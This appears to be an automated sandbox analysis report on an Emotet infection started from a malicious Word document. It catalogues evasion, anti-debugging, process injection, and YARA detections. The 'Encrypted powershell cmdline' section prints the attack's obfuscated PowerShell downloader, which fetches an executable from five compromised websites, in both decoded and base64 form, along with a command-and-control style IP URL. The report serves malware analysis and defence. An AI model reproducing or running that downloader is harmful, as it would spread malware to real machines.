Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\982.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\982.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Windows\System32\sortedwatched.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_12-2912
Source: C:\Users\user\982.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_5-2961

Checks the free space of harddrives

Show sources

Source: C:\Users\user\982.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Contains functionality to enumerate running services

Show sources

Source: C:\Users\user\982.exe	Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,		7_2_0040F504
Source: C:\Windows\System32\sortedwatched.exe	Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,		12_2_0040F504

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Users\user\982.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_4-29669

Found large amount of non-executed APIs

Show sources

Source: C:\Users\user\982.exe	API coverage: 6.9 %
Source: C:\Users\user\982.exe	API coverage: 6.6 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\982.exe TID: 3744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe TID: 3836	Thread sleep time: -60000s >= -30000s	Jump to behavior

Contains functionality to query system information

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_00427ECC VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

4_2_00427ECC

Program exit points

Show sources

Source: C:\Users\user\982.exe	API call chain: ExitProcess graph end node	graph_4-29872
Source: C:\Users\user\982.exe	API call chain: ExitProcess graph end node	graph_5-2880
Source: C:\Users\user\982.exe	API call chain: ExitProcess graph end node	graph_7-2847
Source: C:\Windows\System32\sortedwatched.exe	API call chain: ExitProcess graph end node	graph_12-2829
Source: C:\Windows\System32\sortedwatched.exe	API call chain: ExitProcess graph end node	graph_12-2837

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0042E3B3

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_00427ECC VirtualProtect ?,-00000001,00000104,?

4_2_00427ECC

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\982.exe

4_2_00432522

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\982.exe	Code function: 4_2_00407F70 mov eax, dword ptr fs:[00000030h]	4_2_00407F70
Source: C:\Users\user\982.exe	Code function: 4_2_002C213F mov eax, dword ptr fs:[00000030h]	4_2_002C213F
Source: C:\Users\user\982.exe	Code function: 4_2_002C219F mov eax, dword ptr fs:[00000030h]	4_2_002C219F
Source: C:\Users\user\982.exe	Code function: 4_2_002C0467 mov eax, dword ptr fs:[00000030h]	4_2_002C0467
Source: C:\Users\user\982.exe	Code function: 4_2_002C3743 mov eax, dword ptr fs:[00000030h]	4_2_002C3743
Source: C:\Users\user\982.exe	Code function: 4_2_002C2C0C mov eax, dword ptr fs:[00000030h]	4_2_002C2C0C
Source: C:\Users\user\982.exe	Code function: 4_2_004F0E18 push dword ptr fs:[00000030h]	4_2_004F0E18
Source: C:\Users\user\982.exe	Code function: 4_2_00522860 mov eax, dword ptr fs:[00000030h]	4_2_00522860
Source: C:\Users\user\982.exe	Code function: 4_2_00522800 mov eax, dword ptr fs:[00000030h]	4_2_00522800
Source: C:\Users\user\982.exe	Code function: 5_2_00401E04 mov eax, dword ptr fs:[00000030h]	5_2_00401E04
Source: C:\Users\user\982.exe	Code function: 5_2_004012CD mov eax, dword ptr fs:[00000030h]	5_2_004012CD
Source: C:\Users\user\982.exe	Code function: 6_2_003E2C0C mov eax, dword ptr fs:[00000030h]	6_2_003E2C0C
Source: C:\Users\user\982.exe	Code function: 6_2_003E0467 mov eax, dword ptr fs:[00000030h]	6_2_003E0467
Source: C:\Users\user\982.exe	Code function: 6_2_003E213F mov eax, dword ptr fs:[00000030h]	6_2_003E213F
Source: C:\Users\user\982.exe	Code function: 6_2_003E3743 mov eax, dword ptr fs:[00000030h]	6_2_003E3743
Source: C:\Users\user\982.exe	Code function: 6_2_003E219F mov eax, dword ptr fs:[00000030h]	6_2_003E219F
Source: C:\Users\user\982.exe	Code function: 6_2_00470E18 push dword ptr fs:[00000030h]	6_2_00470E18
Source: C:\Users\user\982.exe	Code function: 6_2_00492860 mov eax, dword ptr fs:[00000030h]	6_2_00492860
Source: C:\Users\user\982.exe	Code function: 6_2_00492800 mov eax, dword ptr fs:[00000030h]	6_2_00492800
Source: C:\Users\user\982.exe	Code function: 7_2_00401E04 mov eax, dword ptr fs:[00000030h]	7_2_00401E04
Source: C:\Users\user\982.exe	Code function: 7_2_004012CD mov eax, dword ptr fs:[00000030h]	7_2_004012CD
Source: C:\Users\user\982.exe	Code function: 7_1_00401E04 mov eax, dword ptr fs:[00000030h]	7_1_00401E04
Source: C:\Users\user\982.exe	Code function: 7_1_004012CD mov eax, dword ptr fs:[00000030h]	7_1_004012CD
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E2C0C mov eax, dword ptr fs:[00000030h]	9_2_003E2C0C
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E0467 mov eax, dword ptr fs:[00000030h]	9_2_003E0467
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E213F mov eax, dword ptr fs:[00000030h]	9_2_003E213F
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E3743 mov eax, dword ptr fs:[00000030h]	9_2_003E3743
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E219F mov eax, dword ptr fs:[00000030h]	9_2_003E219F
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_00580E18 push dword ptr fs:[00000030h]	9_2_00580E18
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_005A2860 mov eax, dword ptr fs:[00000030h]	9_2_005A2860
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_005A2800 mov eax, dword ptr fs:[00000030h]	9_2_005A2800
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_003F0E18 push dword ptr fs:[00000030h]	11_2_003F0E18
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F0467 mov eax, dword ptr fs:[00000030h]	11_2_004F0467
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F2C0C mov eax, dword ptr fs:[00000030h]	11_2_004F2C0C
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F3743 mov eax, dword ptr fs:[00000030h]	11_2_004F3743
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F213F mov eax, dword ptr fs:[00000030h]	11_2_004F213F
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F219F mov eax, dword ptr fs:[00000030h]	11_2_004F219F
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_005B2860 mov eax, dword ptr fs:[00000030h]	11_2_005B2860
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_005B2800 mov eax, dword ptr fs:[00000030h]	11_2_005B2800
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00401E04 mov eax, dword ptr fs:[00000030h]	12_2_00401E04
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_004012CD mov eax, dword ptr fs:[00000030h]	12_2_004012CD
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_00401E04 mov eax, dword ptr fs:[00000030h]	12_1_00401E04
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_004012CD mov eax, dword ptr fs:[00000030h]	12_1_004012CD

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_004016A0 GetProcessHeap,HeapFree,

4_2_004016A0

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\982.exe	Code function: 4_2_0042B721 SetUnhandledExceptionFilter,	4_2_0042B721
Source: C:\Users\user\982.exe	Code function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0042E3B3
Source: C:\Users\user\982.exe	Code function: 4_2_0043146A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0043146A
Source: C:\Users\user\982.exe	Code function: 4_2_00427DFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00427DFF

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Show sources

Source: unknown

Process created: Base64 decoded $mHKwRF='JIbnvfoL';$b3aSim4_ = '982';$GvHK2M='n_vPjrp';$QziABB6L=$env:userprofile+'\'+$b3aSim4_+'.exe';$jwt7_N='Z6G6oToS';$z_nf09=.('new-'+'ob'+'ject') nEt.WebClient;$EIpSGwu='https://sabiosdelamor.co/wp-content/VtyEqoElo/@https://www.euroausili.it/wp-content/iIFSXTWmN/@https://opel.km.ua/blogs/3uju_tiowf9i-149/@https://hablabestop.live/rqbe9p/pKkLiuqGj/@https://dogongulong.vn/wp-admin/vaIDeyDj/'."sP`liT"('@');$Xn9Tjqi='W548GPbi';foreach($CiXHiW in $EIpSGwu){try{$z_nf09."d`ow`N`lOADFIle"($CiXHiW, $Qz

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\982.exe

Section loaded: unknown target pid: 3668 protection: execute and read and write

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\982.exe	Thread register set: target process: 3668	Jump to behavior
Source: C:\Users\user\982.exe	Thread register set: target process: 3600	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Thread register set: target process: 3704	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Thread register set: target process: 3780	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Show sources

Source: C:\Users\user\982.exe

Thread register set: 3668 775EA4F4

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvA

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Users\user\982.exe	Code function: GetLocaleInfoA,		4_2_00435022
Source: C:\Users\user\982.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,		4_2_0041CEDC

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_004093C0 cpuid

4_2_004093C0

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\982.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_0042C660 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,RtlQueryPerformanceCounter,

4_2_0042C660

Contains functionality to query windows version

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_0040B793 _memset,GetVersionExA,

4_2_0040B793

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\982.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
13:29:43	API Interceptor	47x Sleep call for process: powershell.exe modified
13:29:48	API Interceptor	67x Sleep call for process: 982.exe modified
13:29:59	API Interceptor	892x Sleep call for process: sortedwatched.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Nuovo_documento_2019.09.20.doc	22%	Virustotal		Browse
Nuovo_documento_2019.09.20.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\982.exe	16%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.1.982.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.982.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.sortedwatched.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.sortedwatched.exe.5a3000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.982.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.982.exe.493000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.sortedwatched.exe.5b3000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.1.sortedwatched.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.982.exe.523000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.1.sortedwatched.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.sortedwatched.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.1.982.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
sabiosdelamor.co	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://181.164.8.25/attrib/schema/pdf/merge/	0%	Avira URL Cloud	safe
http://181.164.8.25/attrib/schema/pdf/merge/n	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000007.00000002.324668034.00400000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000A.00000002.322151721.00400000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000A.00000001.321515804.00400000.00000040.00020000.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000007.00000001.301581248.00400000.00000040.00020000.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000004.00000002.296876594.002C0000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000006.00000002.302449572.003E0000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000C.00000002.559716338.00400000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000C.00000001.326445222.00400000.00000040.00020000.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000006.00000002.302707019.00493000.00000004.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000005.00000002.296478770.00400000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000009.00000002.323191242.005A3000.00000004.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000005.00000001.295966721.00400000.00000040.00020000.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000009.00000002.322934550.003E0000.00000040.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000004.00000002.297316445.00523000.00000004.00000001.sdmp	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.982.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.1.982.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.1.sortedwatched.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.2.sortedwatched.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.2.sortedwatched.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
9.2.sortedwatched.exe.5a3000.2.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.2.sortedwatched.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
4.2.982.exe.523000.2.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.2.982.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.2.982.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.1.982.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.2.982.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
6.2.982.exe.493000.2.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
11.2.sortedwatched.exe.5b3000.2.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
